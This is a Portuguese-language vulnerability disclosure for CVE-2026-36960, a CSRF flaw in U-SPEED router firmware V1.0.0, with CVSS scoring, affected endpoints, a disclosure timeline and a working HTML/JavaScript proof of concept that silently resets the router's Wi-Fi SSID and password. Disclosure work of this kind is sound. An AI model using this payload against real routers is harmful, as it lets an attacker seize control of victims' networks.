
Prova de conceito de exploit para CVE-2026-36960, uma vulnerabilidade de CSRF no firmware do roteador U-SPEED que permite alterações de configuração não autorizadas por meio de requisições forjadas.
ID CVE: CVE-2026-36960 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: U-SPEED Produto: Roteador U-SPEED Versão do Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
O firmware V1.0.0 do Roteador U-SPEED não implementa mecanismos de proteção contra CSRF, como tokens anti-CSRF ou validação rigorosa de cabeçalhos Origin/Referer para endpoints administrativos da API. Um atacante pode criar uma página da web maliciosa que envia requisições HTTP forjadas para endpoints de configuração. Se um administrador autenticado visitar a página da web maliciosa, o roteador processa a requisição como uma ação administrativa legítima.
Pontuação CVSS v3.1: 8.8 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Métrica | Valor |
|---|
| Vetor de Ataque | Rede |
| Complexidade do Ataque | Baixa |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Necessária |
| Impacto na Confidencialidade | Alto |
| Impacto na Integridade | Alto |
| Impacto na Disponibilidade | Alto |
| Endpoint | Função |
|---|---|
/api/setWlan | Configuração da rede sem fio |
/api/telnet | Configuração do serviço Telnet |
| Outros endpoints de configuração | Várias funções administrativas |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportamento Esperado: A requisição deve ser rejeitada devido à ausência de token CSRF. Comportamento Real: O roteador aceita e processa a requisição forjada.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidade descoberta |
| 2026-04-29 | Reportada à MITRE |
| 2026-04-29 | CVE-2026-36960 atribuído |
| 2026-04-29 | Divulgação pública |